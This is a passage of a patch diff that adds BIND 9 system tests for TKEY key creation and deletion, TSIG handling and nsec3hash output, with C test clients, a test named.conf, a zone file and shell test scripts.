See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out.* rndc.out.* ns1/named.conf +rm -f K* ns1/K* +rm -f */named.memstats +rm -f */named.run +rm -f ns1/_default.tsigkeys +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/tkey/keycreate.c b/bin/tests/system/tkey/keycreate.c new file mode 100644 index 0000000..c62fec1 --- /dev/null +++ b/bin/tests/system/tkey/keycreate.c @@ -0,0 +1,301 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +#include <stdlib.h> +#include <string.h> + +#include <isc/app.h> +#include <isc/base64.h> +#include <isc/hash.h> +#include <isc/log.h> +#include <isc/managers.h> +#include <isc/mem.h> +#include <isc/nonce.h> +#include <isc/print.h> +#include <isc/random.h> +#include <isc/sockaddr.h> +#include <isc/socket.h> +#include <isc/task.h> +#include <isc/timer.h> +#include <isc/util.h> + +#include <pk11/site.h> + +#include <dns/dispatch.h> +#include <dns/fixedname.h> +#include <dns/keyvalues.h> +#include <dns/message.h> +#include <dns/name.h> +#include <dns/request.h> +#include <dns/result.h> +#include <dns/tkey.h> +#include <dns/tsig.h> +#include <dns/view.h> + +#include <dst/result.h> + +#define CHECK(str, x) \ + { \ + if ((x) != ISC_R_SUCCESS) { \ + fprintf(stderr, "I:%s: %s\n", (str), \ + isc_result_totext(x)); \ + exit(-1); \ + } \ + } + +#define RUNCHECK(x) RUNTIME_CHECK((x) == ISC_R_SUCCESS) + +#define PORT 5300 +#define TIMEOUT 30 + +static dst_key_t *ourkey = NULL; +static isc_mem_t *mctx = NULL; +static dns_tsigkey_t *tsigkey = NULL, *initialkey = NULL; +static dns_tsig_keyring_t *ring = NULL; +static unsigned char noncedata[16]; +static isc_buffer_t nonce; +static dns_requestmgr_t *requestmgr = NULL; +static const char *ownername_str = "."; + +static void +recvquery(isc_task_t *task, isc_event_t *event) { + dns_requestevent_t *reqev = (dns_requestevent_t *)event; + isc_result_t result; + dns_message_t *query = NULL, *response = NULL; + char keyname[256]; + isc_buffer_t keynamebuf; + int type; + + UNUSED(task); + + REQUIRE(reqev != NULL); + + if (reqev->result != ISC_R_SUCCESS) { + fprintf(stderr, "I:request event result: %s\n", + isc_result_totext(reqev->result)); + exit(-1); + } + + query = reqev->ev_arg; + + dns_message_create(mctx, DNS_MESSAGE_INTENTPARSE, &response); + + result = dns_request_getresponse(reqev->request, response, + DNS_MESSAGEPARSE_PRESERVEORDER); + CHECK("dns_request_getresponse", result); + + if (response->rcode != dns_rcode_noerror) { + result = ISC_RESULTCLASS_DNSRCODE + response->rcode; + fprintf(stderr, "I:response rcode: %s\n", + isc_result_totext(result)); + exit(-1); + } + + result = dns_tkey_processdhresponse(query, response, ourkey, &nonce, + &tsigkey, ring); + CHECK("dns_tkey_processdhresponse", result); + + /* + * Yes, this is a hack. + */ + isc_buffer_init(&keynamebuf, keyname, sizeof(keyname)); + result = dst_key_buildfilename(tsigkey->key, 0, "", &keynamebuf); + CHECK("dst_key_buildfilename", result); + printf("%.*s\n", (int)isc_buffer_usedlength(&keynamebuf), + (char *)isc_buffer_base(&keynamebuf)); + type = DST_TYPE_PRIVATE | DST_TYPE_PUBLIC | DST_TYPE_KEY; + result = dst_key_tofile(tsigkey->key, type, ""); + CHECK("dst_key_tofile", result); + + dns_message_detach(&query); + dns_message_detach(&response); + dns_request_destroy(&reqev->request); + isc_event_free(&event); + isc_app_shutdown(); + return; +} + +static void +sendquery(isc_task_t *task, isc_event_t *event) { + struct in_addr inaddr; + isc_sockaddr_t address; + isc_region_t r; + isc_result_t result; + dns_fixedname_t keyname; + dns_fixedname_t ownername; + isc_buffer_t namestr, keybuf; + unsigned char keydata[9]; + dns_message_t *query = NULL; + dns_request_t *request = NULL; + static char keystr[] = "0123456789ab"; + + isc_event_free(&event); + + result = ISC_R_FAILURE; + if (inet_pton(AF_INET, "10.53.0.1", &inaddr) != 1) { + CHECK("inet_pton", result); + } + isc_sockaddr_fromin(&address, &inaddr, PORT); + + dns_fixedname_init(&keyname); + isc_buffer_constinit(&namestr, "tkeytest.", 9); + isc_buffer_add(&namestr, 9); + result = dns_name_fromtext(dns_fixedname_name(&keyname), &namestr, NULL, + 0, NULL); + CHECK("dns_name_fromtext", result); + + dns_fixedname_init(&ownername); + isc_buffer_constinit(&namestr, ownername_str, strlen(ownername_str)); + isc_buffer_add(&namestr, strlen(ownername_str)); + result = dns_name_fromtext(dns_fixedname_name(&ownername), &namestr, + NULL, 0, NULL); + CHECK("dns_name_fromtext", result); + + isc_buffer_init(&keybuf, keydata, 9); + result = isc_base64_decodestring(keystr, &keybuf); + CHECK("isc_base64_decodestring", result); + + isc_buffer_usedregion(&keybuf, &r); + + result = dns_tsigkey_create( + dns_fixedname_name(&keyname), DNS_TSIG_HMACMD5_NAME, + isc_buffer_base(&keybuf), isc_buffer_usedlength(&keybuf), false, + NULL, 0, 0, mctx, ring, &initialkey); + CHECK("dns_tsigkey_create", result); + + dns_message_create(mctx, DNS_MESSAGE_INTENTRENDER, &query); + + result = dns_tkey_builddhquery(query, ourkey, + dns_fixedname_name(&ownername), + DNS_TSIG_HMACMD5_NAME, &nonce, 3600); + CHECK("dns_tkey_builddhquery", result); + + result = dns_request_create(requestmgr, query, &address, + DNS_REQUESTOPT_TCP, initialkey, TIMEOUT, + task, recvquery, query, &request); + CHECK("dns_request_create", result); +} + +int +main(int argc, char *argv[]) { + char *ourkeyname = NULL; + isc_nm_t *netmgr = NULL; + isc_taskmgr_t *taskmgr = NULL; + isc_timermgr_t *timermgr = NULL; + isc_socketmgr_t *socketmgr = NULL; + isc_socket_t *sock = NULL; + unsigned int attrs, attrmask; + isc_sockaddr_t bind_any; + dns_dispatchmgr_t *dispatchmgr = NULL; + dns_dispatch_t *dispatchv4 = NULL; + dns_view_t *view = NULL; + dns_tkeyctx_t *tctx = NULL; + isc_log_t *log = NULL; + isc_logconfig_t *logconfig = NULL; + isc_task_t *task = NULL; + isc_result_t result; + int type; + + RUNCHECK(isc_app_start()); + + if (argc < 2) { + fprintf(stderr, "I:no DH key provided\n"); + exit(-1); + } + if (strcmp(argv[1], "-r") == 0) { + fprintf(stderr, "I:the -r option has been deprecated\n"); + exit(-1); + } + ourkeyname = argv[1]; + + if (argc >= 3) { + ownername_str = argv[2]; + } + + dns_result_register(); + + isc_mem_debugging = ISC_MEM_DEBUGRECORD; + isc_mem_create(&mctx); + + isc_log_create(mctx, &log, &logconfig); + + RUNCHECK(dst_lib_init(mctx, NULL)); + + RUNCHECK(isc_managers_create(mctx, 1, 0, &netmgr, &taskmgr)); + RUNCHECK(isc_task_create(taskmgr, 0, &task)); + RUNCHECK(isc_timermgr_create(mctx, &timermgr)); + RUNCHECK(isc_socketmgr_create(mctx, &socketmgr)); + RUNCHECK(dns_dispatchmgr_create(mctx, &dispatchmgr)); + isc_sockaddr_any(&bind_any); + attrs = DNS_DISPATCHATTR_UDP | DNS_DISPATCHATTR_MAKEQUERY | + DNS_DISPATCHATTR_IPV4; + attrmask = DNS_DISPATCHATTR_UDP | DNS_DISPATCHATTR_TCP | + DNS_DISPATCHATTR_IPV4 | DNS_DISPATCHATTR_IPV6; + RUNCHECK(dns_dispatch_getudp(dispatchmgr, socketmgr, taskmgr, &bind_any, + 4096, 4, 2, 3, 5, attrs, attrmask, + &dispatchv4)); + RUNCHECK(dns_requestmgr_create(mctx, timermgr, socketmgr, taskmgr, + dispatchmgr, dispatchv4, NULL, + &requestmgr)); + + RUNCHECK(dns_tsigkeyring_create(mctx, &ring)); + RUNCHECK(dns_tkeyctx_create(mctx, &tctx)); + + RUNCHECK(dns_view_create(mctx, 0, "_test", &view)); + dns_view_setkeyring(view, ring); + dns_tsigkeyring_detach(&ring); + + RUNCHECK(isc_socket_create(socketmgr, PF_INET, isc_sockettype_udp, + &sock)); + + RUNCHECK(isc_app_onrun(mctx, task, sendquery, NULL)); + + type = DST_TYPE_PUBLIC | DST_TYPE_PRIVATE | DST_TYPE_KEY; + result = dst_key_fromnamedfile(ourkeyname, NULL, type, mctx, &ourkey); + CHECK("dst_key_fromnamedfile", result); + + isc_buffer_init(&nonce, noncedata, sizeof(noncedata)); + isc_nonce_buf(noncedata, sizeof(noncedata)); + isc_buffer_add(&nonce, sizeof(noncedata)); + + (void)isc_app_run(); + + dns_requestmgr_shutdown(requestmgr); + dns_requestmgr_detach(&requestmgr); + dns_dispatch_detach(&dispatchv4); + dns_dispatchmgr_destroy(&dispatchmgr); + isc_task_shutdown(task); + isc_task_detach(&task); + isc_managers_destroy(&netmgr, &taskmgr); + isc_socket_detach(&sock); + isc_socketmgr_destroy(&socketmgr); + isc_timermgr_destroy(&timermgr); + + dst_key_free(&ourkey); + dns_tsigkey_detach(&initialkey); + dns_tsigkey_detach(&tsigkey); + + dns_tkeyctx_destroy(&tctx); + + dns_view_detach(&view); + + isc_log_destroy(&log); + + dst_lib_destroy(); + + isc_mem_destroy(&mctx); + + isc_app_finish(); + + return (0); +} diff --git a/bin/tests/system/tkey/keydelete.c b/bin/tests/system/tkey/keydelete.c new file mode 100644 index 0000000..bd67d39 --- /dev/null +++ b/bin/tests/system/tkey/keydelete.c @@ -0,0 +1,242 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +#include <stdlib.h> +#include <string.h> + +#include <isc/app.h> +#include <isc/base64.h> +#include <isc/hash.h> +#include <isc/log.h> +#include <isc/managers.h> +#include <isc/mem.h> +#include <isc/print.h> +#include <isc/random.h> +#include <isc/sockaddr.h> +#include <isc/socket.h> +#include <isc/task.h> +#include <isc/timer.h> +#include <isc/util.h> + +#include <pk11/site.h> + +#include <dns/dispatch.h> +#include <dns/fixedname.h> +#include <dns/keyvalues.h> +#include <dns/message.h> +#include <dns/name.h> +#include <dns/request.h> +#include <dns/result.h> +#include <dns/tkey.h> +#include <dns/tsig.h> +#include <dns/view.h> + +#include <dst/result.h> + +#define CHECK(str, x) \ + { \ + if ((x) != ISC_R_SUCCESS) { \ + fprintf(stderr, "I:%s: %s\n", (str), \ + isc_result_totext(x)); \ + exit(-1); \ + } \ + } + +#define RUNCHECK(x) RUNTIME_CHECK((x) == ISC_R_SUCCESS) + +#define PORT 5300 +#define TIMEOUT 30 + +static isc_mem_t *mctx = NULL; +static dns_tsigkey_t *tsigkey = NULL; +static dns_tsig_keyring_t *ring = NULL; +static dns_requestmgr_t *requestmgr = NULL; + +static void +recvquery(isc_task_t *task, isc_event_t *event) { + dns_requestevent_t *reqev = (dns_requestevent_t *)event; + isc_result_t result; + dns_message_t *query = NULL, *response = NULL; + + UNUSED(task); + + REQUIRE(reqev != NULL); + + if (reqev->result != ISC_R_SUCCESS) { + fprintf(stderr, "I:request event result: %s\n", + isc_result_totext(reqev->result)); + exit(-1); + } + + query = reqev->ev_arg; + + dns_message_create(mctx, DNS_MESSAGE_INTENTPARSE, &response); + + result = dns_request_getresponse(reqev->request, response, + DNS_MESSAGEPARSE_PRESERVEORDER); + CHECK("dns_request_getresponse", result); + + if (response->rcode != dns_rcode_noerror) { + result = ISC_RESULTCLASS_DNSRCODE + response->rcode; + fprintf(stderr, "I:response rcode: %s\n", + isc_result_totext(result)); + exit(-1); + } + + result = dns_tkey_processdeleteresponse(query, response, ring); + CHECK("dns_tkey_processdhresponse", result); + + dns_message_detach(&query); + dns_message_detach(&response); + dns_request_destroy(&reqev->request); + isc_event_free(&event); + isc_app_shutdown(); + return; +} + +static void +sendquery(isc_task_t *task, isc_event_t *event) { + struct in_addr inaddr; + isc_sockaddr_t address; + isc_result_t result; + dns_message_t *query = NULL; + dns_request_t *request = NULL; + + isc_event_free(&event); + + result = ISC_R_FAILURE; + if (inet_pton(AF_INET, "10.53.0.1", &inaddr) != 1) { + CHECK("inet_pton", result); + } + isc_sockaddr_fromin(&address, &inaddr, PORT); + + dns_message_create(mctx, DNS_MESSAGE_INTENTRENDER, &query); + + result = dns_tkey_builddeletequery(query, tsigkey); + CHECK("dns_tkey_builddeletequery", result); + + result = dns_request_create(requestmgr, query, &address, + DNS_REQUESTOPT_TCP, tsigkey, TIMEOUT, task, + recvquery, query, &request); + CHECK("dns_request_create", result); +} + +int +main(int argc, char **argv) { + char *keyname = NULL; + isc_nm_t *netmgr = NULL; + isc_taskmgr_t *taskmgr = NULL; + isc_timermgr_t *timermgr = NULL; + isc_socketmgr_t *socketmgr = NULL; + isc_socket_t *sock = NULL; + unsigned int attrs, attrmask; + isc_sockaddr_t bind_any; + dns_dispatchmgr_t *dispatchmgr = NULL; + dns_dispatch_t *dispatchv4 = NULL; + dns_view_t *view = NULL; + dns_tkeyctx_t *tctx = NULL; + dst_key_t *dstkey = NULL; + isc_log_t *log = NULL; + isc_logconfig_t *logconfig = NULL; + isc_task_t *task = NULL; + isc_result_t result; + int type; + + RUNCHECK(isc_app_start()); + + if (argc < 2) { + fprintf(stderr, "I:no key to delete\n"); + exit(-1); + } + if (strcmp(argv[1], "-r") == 0) { + fprintf(stderr, "I:The -r options has been deprecated\n"); + exit(-1); + } + keyname = argv[1]; + + dns_result_register(); + + isc_mem_create(&mctx); + + isc_log_create(mctx, &log, &logconfig); + + RUNCHECK(dst_lib_init(mctx, NULL)); + + RUNCHECK(isc_managers_create(mctx, 1, 0, &netmgr, &taskmgr)); + RUNCHECK(isc_task_create(taskmgr, 0, &task)); + RUNCHECK(isc_timermgr_create(mctx, &timermgr)); + RUNCHECK(isc_socketmgr_create(mctx, &socketmgr)); + RUNCHECK(dns_dispatchmgr_create(mctx, &dispatchmgr)); + isc_sockaddr_any(&bind_any); + attrs = DNS_DISPATCHATTR_UDP | DNS_DISPATCHATTR_MAKEQUERY | + DNS_DISPATCHATTR_IPV4; + attrmask = DNS_DISPATCHATTR_UDP | DNS_DISPATCHATTR_TCP | + DNS_DISPATCHATTR_IPV4 | DNS_DISPATCHATTR_IPV6; + RUNCHECK(dns_dispatch_getudp(dispatchmgr, socketmgr, taskmgr, &bind_any, + 4096, 4, 2, 3, 5, attrs, attrmask, + &dispatchv4)); + RUNCHECK(dns_requestmgr_create(mctx, timermgr, socketmgr, taskmgr, + dispatchmgr, dispatchv4, NULL, + &requestmgr)); + + RUNCHECK(dns_tsigkeyring_create(mctx, &ring)); + RUNCHECK(dns_tkeyctx_create(mctx, &tctx)); + + RUNCHECK(dns_view_create(mctx, 0, "_test", &view)); + dns_view_setkeyring(view, ring); + + RUNCHECK(isc_socket_create(socketmgr, PF_INET, isc_sockettype_udp, + &sock)); + + RUNCHECK(isc_app_onrun(mctx, task, sendquery, NULL)); + + type = DST_TYPE_PUBLIC | DST_TYPE_PRIVATE | DST_TYPE_KEY; + result = dst_key_fromnamedfile(keyname, NULL, type, mctx, &dstkey); + CHECK("dst_key_fromnamedfile", result); + result = dns_tsigkey_createfromkey(dst_key_name(dstkey), + DNS_TSIG_HMACMD5_NAME, dstkey, true, + NULL, 0, 0, mctx, ring, &tsigkey); + dst_key_free(&dstkey); + CHECK("dns_tsigkey_createfromkey", result); + + (void)isc_app_run(); + + dns_requestmgr_shutdown(requestmgr); + dns_requestmgr_detach(&requestmgr); + dns_dispatch_detach(&dispatchv4); + dns_dispatchmgr_destroy(&dispatchmgr); + isc_task_shutdown(task); + isc_task_detach(&task); + isc_managers_destroy(&netmgr, &taskmgr); + isc_socket_detach(&sock); + isc_socketmgr_destroy(&socketmgr); + isc_timermgr_destroy(&timermgr); + + dns_tsigkeyring_detach(&ring); + + dns_tsigkey_detach(&tsigkey); + + dns_tkeyctx_destroy(&tctx); + + dns_view_detach(&view); + + isc_log_destroy(&log); + + dst_lib_destroy(); + + isc_mem_destroy(&mctx); + + isc_app_finish(); + + return (0); +} diff --git a/bin/tests/system/tkey/ns1/example.db b/bin/tests/system/tkey/ns1/example.db new file mode 100644 index 0000000..a847946 --- /dev/null +++ b/bin/tests/system/tkey/ns1/example.db @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 1D + +@ IN SOA ns hostmaster ( + 1 + 3600 + 1800 + 1814400 + 3 + ) + NS ns +ns A 10.53.0.1 +mx MX 10 mail +a A 10.53.0.1 + A 10.53.0.2 +txt TXT "this is text" + diff --git a/bin/tests/system/tkey/ns1/named.conf.in b/bin/tests/system/tkey/ns1/named.conf.in new file mode 100644 index 0000000..c183880 --- /dev/null +++ b/bin/tests/system/tkey/ns1/named.conf.in @@ -0,0 +1,49 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port 5300; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify no; + tkey-domain "server"; + tkey-dhkey "server" KEYID; + allow-query-cache { any; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port 9953 allow { any; } keys { rndc_key; }; +}; + +key "tkeytest." { + algorithm hmac-md5; + secret "0123456789ab"; +}; + +zone example { + type primary; + file "example.db"; + allow-query { key tkeytest.; none; }; +}; diff --git a/bin/tests/system/tkey/ns1/setup.sh b/bin/tests/system/tkey/ns1/setup.sh new file mode 100644 index 0000000..6471905 --- /dev/null +++ b/bin/tests/system/tkey/ns1/setup.sh @@ -0,0 +1,20 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +keyname=`$KEYGEN -T KEY -a DH -b 768 -n host server` +keyid=$(keyfile_to_key_id $keyname) +rm -f named.conf +sed -e "s;KEYID;$keyid;" < named.conf.in > named.conf diff --git a/bin/tests/system/tkey/setup.sh b/bin/tests/system/tkey/setup.sh new file mode 100644 index 0000000..68a50ad --- /dev/null +++ b/bin/tests/system/tkey/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +cd ns1 && $SHELL setup.sh diff --git a/bin/tests/system/tkey/tests.sh b/bin/tests/system/tkey/tests.sh new file mode 100644 index 0000000..ca466e4 --- /dev/null +++ b/bin/tests/system/tkey/tests.sh @@ -0,0 +1,160 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="@10.53.0.1 -p 5300" + +status=0 +n=1 + +echo_i "generating new DH key ($n)" +ret=0 +dhkeyname=`$KEYGEN -T KEY -a DH -b 768 -n host client` || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" + status=$((status+ret)) + echo_i "exit status: $status" + exit $status +fi +status=`expr $status + $ret` +n=$((n+1)) + +for owner in . foo.example. +do + echo_i "creating new key using owner name \"$owner\" ($n)" + ret=0 + keyname=`$KEYCREATE $dhkeyname $owner` || ret=1 + if [ $ret != 0 ]; then + echo_i "failed" + status=$((status+ret)) + echo_i "exit status: $status" + exit $status + fi + status=`expr $status + $ret` + n=$((n+1)) + + echo_i "checking the new key ($n)" + ret=0 + $DIG $DIGOPTS txt txt.example -k $keyname > dig.out.1 || ret=1 + grep "status: NOERROR" dig.out.1 > /dev/null || ret=1 + grep "TSIG.*hmac-md5.*NOERROR" dig.out.1 > /dev/null || ret=1 + grep "Some TSIG could not be validated" dig.out.1 > /dev/null && ret=1 + if [ $ret != 0 ]; then + echo_i "failed" + fi + status=`expr $status + $ret` + n=$((n+1)) + + echo_i "deleting new key ($n)" + ret=0 + $KEYDELETE $keyname || ret=1 + if [ $ret != 0 ]; then + echo_i "failed" + fi + status=`expr $status + $ret` + n=$((n+1)) + + echo_i "checking that new key has been deleted ($n)" + ret=0 + $DIG $DIGOPTS txt txt.example -k $keyname > dig.out.2 || ret=1 + grep "status: NOERROR" dig.out.2 > /dev/null && ret=1 + grep "TSIG.*hmac-md5.*NOERROR" dig.out.2 > /dev/null && ret=1 + grep "Some TSIG could not be validated" dig.out.2 > /dev/null || ret=1 + if [ $ret != 0 ]; then + echo_i "failed" + fi + status=`expr $status + $ret` + n=$((n+1)) +done + +echo_i "creating new key using owner name bar.example. ($n)" +ret=0 +keyname=`$KEYCREATE $dhkeyname bar.example.` || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" + status=$((status+ret)) + echo_i "exit status: $status" + exit $status +fi +status=`expr $status + $ret` +n=$((n+1)) + +echo_i "checking the key with 'rndc tsig-list' ($n)" +ret=0 +$RNDC -c ../common/rndc.conf -s 10.53.0.1 -p 9953 tsig-list > rndc.out.1 +grep "key \"bar.example.server" rndc.out.1 > /dev/null || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" +fi +status=`expr $status + $ret` +n=$((n+1)) + +echo_i "using key in a request ($n)" +ret=0 +$DIG $DIGOPTS -k $keyname txt.example txt > dig.out.3 || ret=1 +grep "status: NOERROR" dig.out.3 > /dev/null || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" +fi +status=`expr $status + $ret` +n=$((n+1)) + +echo_i "deleting the key with 'rndc tsig-delete' ($n)" +ret=0 +$RNDC -c ../common/rndc.conf -s 10.53.0.1 -p 9953 tsig-delete bar.example.server > /dev/null || ret=1 +$RNDC -c ../common/rndc.conf -s 10.53.0.1 -p 9953 tsig-list > rndc.out.2 +grep "key \"bar.example.server" rndc.out.2 > /dev/null && ret=1 +$DIG $DIGOPTS -k $keyname txt.example txt > dig.out.4 || ret=1 +grep "TSIG could not be validated" dig.out.4 > /dev/null || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" +fi +status=`expr $status + $ret` +n=$((n+1)) + +echo_i "recreating the bar.example. key ($n)" +ret=0 +keyname=`$KEYCREATE $dhkeyname bar.example.` || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" + status=$((status+ret)) + echo_i "exit status: $status" + exit $status +fi +status=`expr $status + $ret` +n=$((n+1)) + +echo_i "checking the new key with 'rndc tsig-list' ($n)" +ret=0 +$RNDC -c ../common/rndc.conf -s 10.53.0.1 -p 9953 tsig-list > rndc.out.3 +grep "key \"bar.example.server" rndc.out.3 > /dev/null || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" +fi +status=`expr $status + $ret` +n=$((n+1)) + +echo_i "using the new key in a request ($n)" +ret=0 +$DIG $DIGOPTS -k $keyname txt.example txt > dig.out.5 || ret=1 +grep "status: NOERROR" dig.out.5 > /dev/null || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" +fi +status=`expr $status + $ret` +n=$((n+1)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/tools/clean.sh b/bin/tests/system/tools/clean.sh new file mode 100644 index 0000000..32a8e97 --- /dev/null +++ b/bin/tests/system/tools/clean.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f NSEC3 +rm -f nsec3hash +rm -f nsec3param +rm -f testcases diff --git a/bin/tests/system/tools/setup.sh b/bin/tests/system/tools/setup.sh new file mode 100644 index 0000000..913e217 --- /dev/null +++ b/bin/tests/system/tools/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +$SHELL clean.sh diff --git a/bin/tests/system/tools/tests.sh b/bin/tests/system/tools/tests.sh new file mode 100644 index 0000000..4ce73e1 --- /dev/null +++ b/bin/tests/system/tools/tests.sh @@ -0,0 +1,105 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 + +checkout() { + case $? in + 0) : ok ;; + *) echo_i "failed" + status=`expr $status + 1` + return 1 ;; + esac + case $out in + *$hash*) : ok ;; + *) echo_i "expect $hash" + echo_i "output $out" + echo_i "failed" + status=`expr $status + 1` ;; + esac +} + +# test cases taken from RFC 5155 appendix A +algo=1 flags=0 iters=12 salt="aabbccdd" +while read name hash +do + echo_i "checking $NSEC3HASH $name" + out=`$NSEC3HASH $salt $algo $iters $name` + checkout + + echo_i "checking $NSEC3HASH -r $name" + out=`$NSEC3HASH -r $algo $flags $iters $salt $name` + checkout + +done <<EOF +*.w.example R53BQ7CC2UVMUBFU5OCMM6PERS9TK9EN +2t7b4g4vsa5smi47k61mv5bv1a22bojr.example KOHAR7MBB8DC2CE8A9QVL8HON4K53UHI +a.example 35MTHGPGCU1QG68FAB165KLNSNK3DPVL +ai.example GJEQE526PLBF1G8MKLP59ENFD789NJGI +example 0P9MHAVEQVM6T7VBL5LOP2U3T2RP3TOM +ns1.example 2T7B4G4VSA5SMI47K61MV5BV1A22BOJR +ns2.example Q04JKCEVQVMU85R014C7DKBA38O0JI5R +w.example K8UDEMVP1J2F7EG6JEBPS17VP3N8I58H +x.w.example B4UM86EGHHDS6NEA196SMVMLO4ORS995 +x.y.w.example 2VPTU5TIMAMQTTGL4LUU9KG21E0AOR3S +xx.example T644EBQK9BIBCNA874GIVR6JOJ62MLHV +y.w.example JI6NEOAEPV8B5O6K4EV33ABHA8HT9FGC +EOF + +# test empty salt +checkempty() { + hash=CK0POJMG874LJREF7EFN8430QVIT8BSM checkout && + hash=- checkout +} +name=com algo=1 flags=1 iters=0 +echo_i "checking $NSEC3HASH '' $name" +out=`$NSEC3HASH '' $algo $iters $name` +checkempty +echo_i "checking $NSEC3HASH - $name" +out=`$NSEC3HASH - $algo $iters $name` +checkempty +echo_i "checking $NSEC3HASH -- '' $name" +out=`$NSEC3HASH -- '' $algo $iters $name` +checkempty +echo_i "checking $NSEC3HASH -- - $name" +out=`$NSEC3HASH -- - $algo $iters $name` +checkempty +echo_i "checking $NSEC3HASH -r '' $name" +out=`$NSEC3HASH -r $algo $flags $iters '' $name` +checkempty +echo_i "checking $NSEC3HASH -r - $name" +out=`$NSEC3HASH -r $algo $flags $iters - $name` +checkempty + +checkfail() { + case $? in + 0) echo_i "failed to fail" + status=`expr $status + 1` + return 1 ;; + esac +} +echo_i "checking $NSEC3HASH missing args" +out=`$NSEC3HASH 00 1 0 2>&1` +checkfail +echo_i "checking $NSEC3HASH extra args" +out=`$NSEC3HASH 00 1 0 two names 2>&1` +checkfail +echo_i "checking $NSEC3HASH bad option" +out=`$NSEC3HASH -? 2>&1` +checkfail + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/tsig/ans2/ans.pl b/bin/tests/system/tsig/ans2/ans.pl new file mode 100644 index 0000000..09ab29b --- /dev/null +++ b/bin/tests/system/tsig/ans2/ans.pl @@ -0,0 +1,52 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# 